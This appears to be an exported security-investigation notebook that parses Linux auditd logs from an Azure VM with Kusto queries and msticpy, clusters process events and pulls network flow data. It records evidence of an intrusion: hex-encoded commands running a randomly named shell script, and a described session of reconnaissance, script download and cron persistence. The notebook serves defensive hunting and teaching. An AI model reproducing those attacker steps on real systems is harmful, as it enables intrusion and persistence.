TenantId SourceSystem MG ManagementGroupName TimeGenerated Computer RawData Type _ResourceId
52b1ab41-869e-4138-9e40-2a4457f09bf0 OpsManager 00000000-0000-0000-0000-000000000002 MSTICAlertsLxVM2 2019-03-24 21:01:10+00:00 MSTICAlertsLxVM2 type=EXECVE msg=audit(1553461201.141:1286673): argc=3 a0="/bin/sh" a1="-c" a2=2E2F51755A59704F62696E732E736820
AuditLog_CL /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.compute/virtualmachines/msticalertslxvm2
52b1ab41-869e-4138-9e40-2a4457f09bf0 OpsManager 00000000-0000-0000-0000-000000000002 MSTICAlertsLxVM2 2019-03-24 21:01:10+00:00 MSTICAlertsLxVM2 type=EXECVE msg=audit(1553461201.145:1286674): argc=3 a0="/bin/sh" a1="-c" a2=5B202D66202F6574632F6B7262352E6B6579746162205D202626205B205C282021202D66202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29202D6F205C28202F6574632F6B7262352E6B6579746162202D6E74202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29205D202626202F6F70742F6F6D692F62696E2F737570706F72742F6B747374726970202F6574632F6B7262352E6B6579746162202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162203E2F6465762F6E756C6C20323E2631207C7C2074727565
AuditLog_CL /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.compute/virtualmachines/msticalertslxvm2
52b1ab41-869e-4138-9e40-2a4457f09bf0 OpsManager 00000000-0000-0000-0000-000000000002 MSTICAlertsLxVM2 2019-03-24 21:01:10+00:00 MSTICAlertsLxVM2 type=EXECVE msg=audit(1553461201.153:1286680): argc=2 a0="/bin/bash" a1="./QuZYpObins.sh"
AuditLog_CL /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.compute/virtualmachines/msticalertslxvm2

Done (00:03.118): 3 records

Out[58]:

Linux Audit Logs - To Dos

There are a few things that we need to deal with here:

  • Splitting and unpacking the fields in each rawdata field
  • Some events (like process exec) have multiple rows associated with them - we need to join these together into a single row
  • Some string fields are hex-encoded (this is to allow embedded characters like spaces)
  • We need also to extract the timestamp from the msg field (this is stored as a Unix timestamp float)
In [59]:
# We use Kusto to as much of the heavy lifting as possible.
# This query splits the rawdata field into message type, message Id and timestamp and message data fields (lines 5 and 6)
# line 7 - get rid of unwanted columns
# line 8 - split the message body into an array of key=value strings
# line 9 - pack the message type and list of contents into a dictionary {'Type': [k1=v1, k2=v2...]}
# line 10 - group by messageId and pack the individual typed_mssg dictionaries into a list of dictionarys

linux_events = r'''
AuditLog_CL
| where Computer has '{hostname}'
| where TimeGenerated >= datetime({start})
| where TimeGenerated <= datetime({end})
| extend mssg_parts = extract_all(@"type=(?P<type>[^\s]+)\s+msg=audit\((?P<mssg_id>[^)]+)\):\s+(?P<mssg>[^\r]+)\r?", dynamic(['type', 'mssg_id', 'mssg']), RawData)
| extend mssg_type = tostring(mssg_parts[0][0]), mssg_id = tostring(mssg_parts[0][1])
| project TenantId, TimeGenerated, Computer, mssg_type, mssg_id, mssg_parts
| extend mssg_content = split(mssg_parts[0][2],' ')
| extend typed_mssg = pack(mssg_type, mssg_content)
| summarize AuditdMessage = makelist(typed_mssg) by TenantId, TimeGenerated, Computer, mssg_id
'''.format(start=host1_q_times.start, end=host1_q_times.end,
           hostname=security_alert.hostname)
print('getting data...')
%kql -query linux_events
linux_events_df = _kql_raw_result_.to_dataframe()
print(f'{len(linux_events_df)} raw auditd mssgs downloaded')
getting data...
17413 raw auditd mssgs downloaded
In [60]:
# Look at a sample of the output
linux_events_df[['Computer', 'TimeGenerated', 'mssg_id', 'AuditdMessage']][0:10]
Out[60]:
Computer TimeGenerated mssg_id AuditdMessage
0 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505627.301:9077922 [{'USER_END': ['pid=28056', 'uid=0', 'auid=4294967295', 'ses=4294967295', 'msg='op=PAM:session_close', 'acct="root"', 'exe="/usr/bin/sudo"', 'hostname=?', 'addr=?', 'terminal=?', 'res=success'']}]
1 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505627.301:9077923 [{'CRED_DISP': ['pid=28056', 'uid=0', 'auid=4294967295', 'ses=4294967295', 'msg='op=PAM:setcred', 'acct="root"', 'exe="/usr/bin/sudo"', 'hostname=?', 'addr=?', 'terminal=?', 'res=success'']}]
2 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505632.285:9077924 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f396d0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28066', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=42949...
3 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505632.289:9077925 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55a693b8bbb8', 'a1=55a693b8bb70', 'a2=55a693b8bb88', 'a3=7f7f05d1b810', 'items=2', 'ppid=28066', 'pid=28067', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)',...
4 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505632.293:9077926 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f396d0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28068', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=42949...
5 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505632.293:9077927 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=5650386da7e0', 'a1=5650386da728', 'a2=5650386da7b0', 'a3=7fbb0edc9810', 'items=2', 'ppid=28068', 'pid=28069', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)',...
6 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505637.305:9077928 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e2c870', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28070', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=42949...
7 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505637.305:9077929 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55b76ef60bb8', 'a1=55b76ef60b70', 'a2=55b76ef60b88', 'a3=7f0e8609d810', 'items=2', 'ppid=28070', 'pid=28071', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)',...
8 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505637.309:9077930 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e2c870', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28072', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=42949...
9 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505637.309:9077931 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55d3f6a4a7e0', 'a1=55d3f6a4a728', 'a2=55d3f6a4a7b0', 'a3=7fd0863a8810', 'items=2', 'ppid=28072', 'pid=28073', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)',...
In [61]:
# We still have some work to do using the auditdextract module from msticpy
# This will do
# - spliting the key=value string
# - the hex decoding of any encoded strings
# - type conversion for int fields
# - for SYSCALL/EXECVE rows we'll do some extract processing to identify the executable that ran
# and re-assemble the commandline arguments
# - extracting the real timestamp and replacing the original TimeGenerated columns (since this was
# just the log import time, not the event time, which is what we are after)
from msticpy.sectools.auditdextract import extract_events_to_df, get_event_subset
linux_events_all = extract_events_to_df(linux_events_df, verbose=True)
Unpacking auditd messages for 17413 events...
Building output dataframe...
Fixing timestamps...
Complete. 17413 output rows time: 13.280467 sec
In [62]:
# Look at a sample - this isn't very clear. We'll see better below.
linux_events_all[0:5]
Out[62]:
EventType TenantId Computer mssg_id TimeGenerated a0 a1 a2 acct addr argc auid cap_fe cap_fi cap_fp cap_fver cmd cmdline comm cwd egid entries euid exe family gid hostname item msg name nametype old-ses pid ppid proctitle res ses success table terminal tty uid
0 USER_END 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsLxVM2 1550505627.301:9077922 2019-02-18 16:00:27.301 NaN NaN NaN root ? NaN -1 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN /usr/bin/sudo NaN NaN ? NaN 'op=PAM:session_close NaN NaN NaN 28056 NaN NaN success' -1 NaN NaN ? NaN 0
1 CRED_DISP 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsLxVM2 1550505627.301:9077923 2019-02-18 16:00:27.301 NaN NaN NaN root ? NaN -1 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN /usr/bin/sudo NaN NaN ? NaN 'op=PAM:setcred NaN NaN NaN 28056 NaN NaN success' -1 NaN NaN ? NaN 0
2 SYSCALL_EXECVE 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsLxVM2 1550505632.285:9077924 2019-02-18 16:00:32.285 /bin/sh -c iptables --version NaN NaN 3.0 -1 NaN NaN NaN NaN NaN /bin/sh -c iptables --version NaN /var/lib/waagent/WALinuxAgent-2.2.36 0.0 NaN 0.0 /bin/dash NaN 0.0 NaN NaN NaN NaN NaN NaN 28066 22536.0 /bin/sh-ciptables --version NaN -1 yes NaN NaN NaN 0
3 SYSCALL_EXECVE 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsLxVM2 1550505632.289:9077925 2019-02-18 16:00:32.289 iptables --version NaN NaN NaN 2.0 -1 NaN NaN NaN NaN NaN iptables --version NaN /var/lib/waagent/WALinuxAgent-2.2.36 0.0 NaN 0.0 /sbin/xtables-multi NaN 0.0 NaN NaN NaN NaN NaN NaN 28067 28066.0 iptables--version NaN -1 yes NaN NaN NaN 0
4 SYSCALL_EXECVE 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsLxVM2 1550505632.293:9077926 2019-02-18 16:00:32.293 /bin/sh -c iptables -w -t security -C OUTPUT -d 168.63.129.16 -p tcp -m conntrack --ctstate INVALID,NEW -j DROP NaN NaN 3.0 -1 NaN NaN NaN NaN NaN /bin/sh -c iptables -w -t security -C OUTPUT -d 168.63.129.16 -p tcp -m conntrack --ctstate INVALID,NEW -j DROP NaN /var/lib/waagent/WALinuxAgent-2.2.36 0.0 NaN 0.0 /bin/dash NaN 0.0 NaN NaN NaN NaN NaN NaN 28068 22536.0 /bin/sh-ciptables -w -t security -C OUTPUT -d 168.63.129.16 -p tcp -m conntrack --ctstate INVALID,NEW -j DROP NaN -1 yes NaN NaN NaN 0

Contents

Event Types collected

It's useful to get an overview of what events we are dealing with. The graph is dominated by SYSCALL_EXECVE (process exec events). We're displaying on a log scale otherwise the very low volume events would be invisible.

In [63]:
sns.set()
(linux_events_all[['EventType', 'TimeGenerated']]
     .groupby('EventType').count().rename(columns={'TimeGenerated': 'EventCount'})
     .sort_values('EventCount', ascending=True)
     .plot.barh(logx=True, figsize=(12,6)));

View events by Type - Process (SYSCALL) and Login events are covered in more detail below. Use this to look at some of the rarer event types to see anything unusual.

In [64]:
# Lets look at the audit messages by type 
from ipywidgets import interactive

# We get the distinct list of event types
items = sorted(linux_events_all['EventType'].unique().tolist())

# this is a nice way of using a Select (list) widget to filter the display
# of the pandas dataframe. The interactive() call below tells the widget
# to call the view function each time an item is selected. The value of the
# item (EventType) is passed to the function and we use it to filter the DataFrame
# before displaying it.
def view(x=''):
    display(linux_events_all[linux_events_all['EventType']==x]
            .drop(['EventType', 'TenantId', 'Computer', 'mssg_id'], axis=1)
            .dropna(axis=1, how='all'))

w = widgets.Select(options=items, description='Select Event Type', **WIDGET_DEFAULTS)
interactive(view, x=w)

Extract Individual Event Types for logon and process events

In [65]:
from msticpy.sectools.auditdextract import extract_events_to_df, get_event_subset
lx_proc_create = get_event_subset(linux_events_all,'SYSCALL_EXECVE')
print(f'{len(lx_proc_create)} Process Create Events')

lx_login = (get_event_subset(linux_events_all, 'LOGIN')
        .merge(get_event_subset(linux_events_all, 'CRED_ACQ'), 
               how='inner',
               left_on=['old-ses', 'pid', 'uid'], 
               right_on=['ses', 'pid', 'uid'],
               suffixes=('', '_cred')).drop(['old-ses','TenantId_cred', 
                                             'Computer_cred'], axis=1)
        .dropna(axis=1, how='all'))
print(f'{len(lx_login)} Login Events')
13046 Process Create Events
269 Login Events

Contents

Failure Events

Can sometimes tell us about attempts to probe around the system that haven't quite worked. Login failures will show up here as well.

In [66]:
lx_fail_events = (linux_events_all[linux_events_all['res'] == "failed'"]
                    .drop(['TenantId', 'mssg_id'], axis=1)
                    .dropna(axis=1, how='all'))
if len(lx_fail_events) > 0:
    display(lx_fail_events)
    add_observation(Observation(caption='Failure events on Linux host.',
                               description='One or more failure events detected on host.',
                               item=lx_fail_events,
                               link='linux_failure_events'))

Contents

Extract IPs from all Events

In [67]:
# Search all events for addr field with an IPAddress (we're looking for any string with a '.'. 
# Drop duplicates and localhost and return list
events_with_ips = (linux_events_all[['EventType','addr']]
                   [linux_events_all['addr'].str.contains(r'\.', na=False)]
                   .drop_duplicates())

# Display any events found
display(events_with_ips)
# Get unique IPs and drop localhost
host_ext_ips = list(events_with_ips['addr'].drop_duplicates().to_dict().values())
if '127.0.0.1' in host_ext_ips:
    host_ext_ips.remove('127.0.0.1')
display(host_ext_ips)
EventType addr
5246 USER_ACCT 23.97.60.214
5247 CRED_ACQ 23.97.60.214
6112 USER_START 23.97.60.214
6301 USER_END 23.97.60.214
6302 CRED_DISP 23.97.60.214
['23.97.60.214']

Contents

Get Logins with IP Address Recorded

In [68]:
# From the logon events that we separated out a few cells back
# we can get the full event details of logons with external IPs                  

logins_with_ips = (lx_login[lx_login['addr'] != '?']
                   [['Computer', 'TimeGenerated','pid', 'ses', 
                     'acct', 'addr', 'exe', 'hostname', 'msg',
                     'res_cred', 'ses_cred', 'terminal']])
if len(logins_with_ips) > 0:
    display(logins_with_ips)
    add_observation(Observation(caption='Login events with source Ip addresses',
                                description=f'{len(logins_with_ips)} logins with external addresses',
                                item=logins_with_ips,
                                link='linux_login_ips'))
Computer TimeGenerated pid ses acct addr exe hostname msg res_cred ses_cred terminal
83 MSTICAlertsLxVM2 2019-02-18 15:29:20.115 24851 196045 dbadmin 23.97.60.214 /usr/sbin/sshd 23.97.60.214 'op=PAM:setcred success' -1 ssh

Contents

What's happening in these sessions?

If there are a lot of events here try the Process Clustering section below.

In [69]:
# We can view the processes run by this logon by using the same DataFrame
# filtering trick.
# We don't have massive numbers of events but there is a lot of clutter and 
# it's not immediately obvious that anything bad is happening
items = sorted(lx_login[lx_login['addr'] != '?']['ses'].unique().tolist())

def view(x=''):
    procs = (lx_proc_create[lx_proc_create['ses']==x]
                [['TimeGenerated', 'exe','cmdline', 'pid','cwd']])
    display(Markdown(f'{len(procs)} process events'))
    display(procs)

w = widgets.Select(options=items, description='Select Session', **WIDGET_DEFAULTS)
interactive(view, x=w)

Contents

Find Distinctive Process Patterns - Clustering

We can get rid of a lot of the clutter in the process data by clustering. We'll look at this in more detail in the next part but it essentially collapses repetitive events into single items allowing us to focus on distinctive events

In [70]:
# To use the clustering library we're going to cheat
# a little and make the Linux events look a bit more like
# Windows events. This isn't completely necessary but makes
# the code a bit simpler.

lx_to_proc_create = {'acct': 'SubjectUserName',
                     'uid': 'SubjectUserSid',
                     'user': 'SubjectUserName',
                     'ses': 'SubjectLogonId',
                     'pid': 'NewProcessId',
                     'exe': 'NewProcessName',
                     'ppid': 'ProcessId',
                     'cmdline': 'CommandLine',}

proc_create_to_lx = {'SubjectUserName': 'acct',
                     'SubjectUserSid': 'uid',
                     'SubjectUserName': 'user',
                     'SubjectLogonId': 'ses',
                     'NewProcessId': 'pid',
                     'NewProcessName': 'exe',
                     'ProcessId': 'ppid',
                     'CommandLine': 'cmdline',}

lx_to_logon = {'acct': 'SubjectUserName',
               'auid': 'SubjectUserSid',
               'user': 'TargetUserName',
               'uid': 'TargetUserSid',
               'ses': 'TargetLogonId',
               'exe': 'LogonProcessName',
               'terminal': 'LogonType',
               'msg': 'AuthenticationPackageName',
               'res': 'Status',
               'addr': 'IpAddress',
               'hostname': 'WorkstationName',}

logon_to_lx = {'SubjectUserName': 'acct',
               'SubjectUserSid': 'auid',
               'TargetUserName': 'user',
               'TargetUserSid': 'uid',
               'TargetLogonId': 'ses',
               'LogonProcessName': 'exe',
               'LogonType': 'terminal',
               'AuthenticationPackageName': 'msg',
               'Status': 'res',
               'IpAddress': 'addr',
               'WorkstationName': 'hostname',}

lx_proc_create_trans = lx_proc_create.rename(columns=lx_to_proc_create)
lx_login_trans = lx_login.rename(columns=lx_to_logon)
In [71]:
# For demo purposes we're actually running the clustering 
# algorithm against all 13k or so process exec events
# and we can see that it's reduced the unique items to 1%
# of the original volume
print('analyzing data...')
from msticpy.sectools.eventcluster import dbcluster_events, add_process_features

feature_procs_h1 = add_process_features(input_frame=lx_proc_create_trans,
                                        path_separator=security_alert.path_separator)


# you might need to play around with the max_cluster_distance parameter.
# decreasing this gives more clusters.
(clus_events, dbcluster, x_data) = dbcluster_events(data=feature_procs_h1,
                                                    cluster_columns=['commandlineTokensFull', 
                                                                     'pathScore',
                                                                    'SubjectUserSid'],
                                                    time_column='TimeGenerated',
                                                    max_cluster_distance=0.0001)
print('Number of input events:', len(feature_procs_h1))
print('Number of clustered events:', len(clus_events))
(clus_events.sort_values('TimeGenerated')[['TimeGenerated', 'LastEventTime',
                                           'NewProcessName', 'CommandLine', 
                                           'ClusterSize', 'commandlineTokensFull',
                                           'SubjectLogonId', 'SubjectUserSid',
                                           'pathScore', 'isSystemSession']]
    .sort_values('ClusterSize', ascending=True));
analyzing data...
Number of input events: 13046
Number of clustered events: 138
In [72]:
# Lets try viewing our session again
# For interactive sessions the compression won't be as good
# but we've reduced it to about 20% of the original

def view(x=''):
    procs = (clus_events[clus_events['SubjectLogonId']==x]
            [['TimeGenerated', 'NewProcessName','CommandLine', 
              'NewProcessId', 'SubjectUserSid', 'cwd', 'ClusterSize', 'SubjectLogonId']])
    display(Markdown(f'{len(procs)} process events'))
    display(procs)

w = widgets.Select(options=items, description='Select Session to view', **WIDGET_DEFAULTS)
interactive(view, x=w)

Badness Uncovered!

On a single screen we can now scan down the whole session and see pretty quickly some very suspicious activity:

  • Reconnaisance - getting machine info, contents of /etc/passwd and mail
  • Downloading a script and making it executable
  • The crontab command is not entirely clear (likely the start of a pipeline) but it seems a good bet that the script is being installed as a cron job
In [73]:
# Let's save our first piece of real evidence in our summary collection
selected_session = w.value
add_observation(Observation(caption='Suspicious Process Session on Linux Host.',
                            description='Attempt to download and run script + recon cmds.',
                            item = clus_events.query('SubjectLogonId == @selected_session & ClusterSize < 3'),
                            link='linux_proc_cluster'))

Contents

Part 2b - Host Network Data

Get the IP Address of the Source Host

In [74]:
                   

host_entities = [e for e in security_alert.entities if isinstance(e, nbtools.Host)]
if len(host_entities) == 1:
    alert_host_entity = host_entities[0]
    host_name = alert_host_entity.HostName
    resource = alert_host_entity.AzureID
else:
    host_name = None
    alert_host_entity = None
    print('Error: Could not determine host entity from alert. Please type the hostname below')
txt_wgt = widgets.Text(value=host_name, description='Confirm Source Host name:', **WIDGET_DEFAULTS)
display(txt_wgt)
In [75]:
             

print('Looking for IP addresses of ', txt_wgt.value)
aznet_query = '''
AzureNetworkAnalytics_CL 
| where VirtualMachine_s has \'{host}\'
| where ResourceType == 'NetworkInterface'
| top 1 by TimeGenerated desc
| project PrivateIPAddresses = PrivateIPAddresses_s, 
    PublicIPAddresses = PublicIPAddresses_s
'''.format(host=txt_wgt.value)
%kql -query aznet_query
az_net_df = _kql_raw_result_.to_dataframe()


oms_heartbeat_query = '''
Heartbeat
| where Computer has \'{host}\'
| top 1 by TimeGenerated desc nulls last
| project ComputerIP, OSType, OSMajorVersion, OSMinorVersion, ResourceId, RemoteIPCountry, 
RemoteIPLatitude, RemoteIPLongitude, SourceComputerId
'''.format(host=txt_wgt.value)
%kql -query oms_heartbeat_query
oms_heartbeat_df = _kql_raw_result_.to_dataframe()
display(oms_heartbeat_df[['ComputerIP']])
display(az_net_df)

print('getting data...')
# Get the host entity and add this IP and system info to the 
try:
    if not inv_host_entity:
        inv_host_entity = entity.Host()
        inv_host_entity.HostName = host_name
except NameError:
    inv_host_entity = entity.Host()
    inv_host_entity.HostName = host_name

def convert_to_ip_entities(ip_str):
    ip_entities = []
    if ip_str:
        if ',' in ip_str:
            addrs = ip_str.split(',')
        elif ' ' in ip_str:
            addrs = ip_str.split(' ')
        else:
            addrs = [ip_str]
        for addr in addrs:
            ip_entity = entity.IpAddress()
            ip_entity.Address = addr.strip()
            iplocation.lookup_ip(ip_entity=ip_entity)
            ip_entities.append(ip_entity)
    return ip_entities

# Add this information to our inv_host_entity
retrieved_address=[]
if len(az_net_df) == 1:
    priv_addr_str = az_net_df['PrivateIPAddresses'].loc[0]
    inv_host_entity.properties['private_ips'] = convert_to_ip_entities(priv_addr_str)

    pub_addr_str = az_net_df['PublicIPAddresses'].loc[0]
    inv_host_entity.properties['public_ips'] = convert_to_ip_entities(pub_addr_str)
    retrieved_address = [ip.Address for ip in inv_host_entity.properties['public_ips']]
else:
    if 'private_ips' not in inv_host_entity.properties:
        inv_host_entity.properties['private_ips'] = []
    if 'public_ips' not in inv_host_entity.properties:
        inv_host_entity.properties['public_ips'] = []
        
if len(oms_heartbeat_df) == 1:
    if oms_heartbeat_df['ComputerIP'].loc[0]:
        oms_address = oms_heartbeat_df['ComputerIP'].loc[0]
        if oms_address not in retrieved_address:
            ip_entity = entity.IpAddress()
            ip_entity.Address = oms_address
            iplocation.lookup_ip(ip_entity=ip_entity)
            inv_host_entity.properties['public_ips'].append(ip_entity)
        
    inv_host_entity.OSFamily = oms_heartbeat_df['OSType'].loc[0]
    inv_host_entity.AdditionalData['OSMajorVersion'] = oms_heartbeat_df['OSMajorVersion'].loc[0]
    inv_host_entity.AdditionalData['OSMinorVersion'] = oms_heartbeat_df['OSMinorVersion'].loc[0]
    inv_host_entity.AdditionalData['SourceComputerId'] = oms_heartbeat_df['SourceComputerId'].loc[0]

print('Updated Host Entity\n')
print(inv_host_entity)
Looking for IP addresses of  MSTICALERTSLXVM2
ComputerIP
0 104.211.30.1
PrivateIPAddresses PublicIPAddresses
0 10.0.3.4 104.211.30.1
getting data...
Updated Host Entity

{ 'AdditionalData': { 'OSMajorVersion': '18',
                      'OSMinorVersion': '04',
                      'SourceComputerId': '44623fb0-bd5f-49ea-84d1-56aa11ab8a25'},
  'HostName': 'MSTICALERTSLXVM2',
  'OSFamily': 'Linux',
  'Type': 'host',
  'private_ips': [{"Address": "10.0.3.4", "Type": "ipaddress"}],
  'public_ips': [ {"Address": "104.211.30.1", "Location": {"CountryCode": "US", "CountryName": "United States", "State": "Virginia", "City": "Washington", "Longitude": -78.1704, "Latitude": 38.7163, "Type": "geolocation"}, "Type": "ipaddress"}]}

Contents

Check Communications with Other Hosts

In [76]:
                   

# Azure Network Analytics Base Query
az_net_analytics_query =r'''
AzureNetworkAnalytics_CL 
| where SubType_s == 'FlowLog'
| where FlowStartTime_t >= datetime({start})
| where FlowEndTime_t <= datetime({end})
| project TenantId, TimeGenerated, 
    FlowStartTime = FlowStartTime_t, 
    FlowEndTime = FlowEndTime_t, 
    FlowIntervalEndTime = FlowIntervalEndTime_t, 
    FlowType = FlowType_s,
    ResourceGroup = split(VM_s, '/')[0],
    VMName = split(VM_s, '/')[1],
    VMIPAddress = VMIP_s, 
    PublicIPs = extractall(@"([\d\.]+)[|\d]+", dynamic([1]), PublicIPs_s),
    SrcIP = SrcIP_s,
    DestIP = DestIP_s,
    ExtIP = iif(FlowDirection_s == 'I', SrcIP_s, DestIP_s),
    L4Protocol = L4Protocol_s, 
    L7Protocol = L7Protocol_s, 
    DestPort = DestPort_d, 
    FlowDirection = FlowDirection_s,
    AllowedOutFlows = AllowedOutFlows_d, 
    AllowedInFlows = AllowedInFlows_d,
    DeniedInFlows = DeniedInFlows_d, 
    DeniedOutFlows = DeniedOutFlows_d,
    RemoteRegion = AzureRegion_s,
    VMRegion = Region_s
| extend AllExtIPs = iif(isempty(PublicIPs), pack_array(ExtIP), 
                         iif(isempty(ExtIP), PublicIPs, array_concat(PublicIPs, pack_array(ExtIP)))
                         )
| project-away ExtIP
| mvexpand AllExtIPs
{where_clause}
'''

ip_q_times = nbtools.QueryTime(label='Set time bounds for network queries',
                           units='hour', max_before=48, before=10, after=5, 
                           max_after=24, origin_time=security_alert.StartTimeUtc)
ip_q_times.display()

Query Flows by Host IP Addresses

In [77]:
                   

all_alert_host_ips = inv_host_entity.private_ips + inv_host_entity.public_ips
host_ips = {'\'{}\''.format(i.Address) for i in all_alert_host_ips}
alert_host_ip_list = ','.join(host_ips)

az_ip_where = f'''
| where (VMIPAddress in ({alert_host_ip_list}) 
        or SrcIP in ({alert_host_ip_list}) 
        or DestIP in ({alert_host_ip_list}) 
        ) and 
    (AllowedOutFlows > 0 or AllowedInFlows > 0)'''
print('getting data...')
az_net_query_byip = az_net_analytics_query.format(where_clause=az_ip_where,
                                                  start = ip_q_times.start,
                                                  end = ip_q_times.end)

net_default_cols = ['FlowStartTime', 'FlowEndTime', 'VMName', 'VMIPAddress', 
                'PublicIPs', 'SrcIP', 'DestIP', 'L4Protocol', 'L7Protocol',
                'DestPort', 'FlowDirection', 'AllowedOutFlows', 
                'AllowedInFlows']

%kql -query az_net_query_byip
az_net_comms_df = _kql_raw_result_.to_dataframe()
az_net_comms_df[net_default_cols]
getting data...
Out[77]:
FlowStartTime FlowEndTime VMName VMIPAddress PublicIPs SrcIP DestIP L4Protocol L7Protocol DestPort FlowDirection AllowedOutFlows AllowedInFlows
0 2019-02-18 06:59:14 2019-02-18 07:58:56 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 628.0 0.0
1 2019-02-18 06:59:14 2019-02-18 07:58:56 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 628.0 0.0
2 2019-02-18 06:59:14 2019-02-18 07:58:56 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 628.0 0.0
3 2019-02-18 06:59:14 2019-02-18 07:58:56 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 628.0 0.0
4 2019-02-18 07:33:36 2019-02-18 07:33:36 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
5 2019-02-18 07:24:15 2019-02-18 07:58:23 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
6 2019-02-18 06:59:02 2019-02-18 07:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 168.62.32.212, 52.239.220.64, 20.38.98.164] T https 443.0 O 2348.0 0.0
7 2019-02-18 06:59:02 2019-02-18 07:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 168.62.32.212, 52.239.220.64, 20.38.98.164] T https 443.0 O 2348.0 0.0
8 2019-02-18 06:59:02 2019-02-18 07:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 168.62.32.212, 52.239.220.64, 20.38.98.164] T https 443.0 O 2348.0 0.0
9 2019-02-18 06:59:02 2019-02-18 07:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 168.62.32.212, 52.239.220.64, 20.38.98.164] T https 443.0 O 2348.0 0.0
10 2019-02-18 07:33:36 2019-02-18 07:33:36 msticalertslxvm2 10.0.3.4 [91.189.88.149] T http 80.0 O 1.0 0.0
11 2019-02-18 05:33:18 2019-02-18 05:33:18 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
12 2019-02-18 05:33:18 2019-02-18 05:33:18 msticalertslxvm2 10.0.3.4 [91.189.88.152] T http 80.0 O 1.0 0.0
13 2019-02-18 05:59:14 2019-02-18 06:58:55 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 632.0 0.0
14 2019-02-18 05:59:14 2019-02-18 06:58:55 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 632.0 0.0
